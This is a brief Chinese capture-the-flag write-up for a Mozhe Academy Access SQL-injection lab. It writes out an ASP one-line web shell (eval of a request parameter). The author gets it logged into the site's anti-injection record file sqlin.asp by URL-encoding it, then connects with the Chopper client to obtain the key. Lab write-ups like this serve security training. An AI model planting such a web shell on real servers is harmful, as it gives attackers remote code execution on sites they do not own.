墨者学院 - SQL注入实战(防注入)-Access
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码
必应一下
access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话
在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了
用火狐浏览器的插件hackbar对一句话进行url encode的加密后再尝试,发现一句话被成功的记录到了sqlin.asp文件中
菜刀对 ip/sqlin.asp 进行连接,成功拿到key
菜刀连接 ip/sqlin.asp 密码为chopper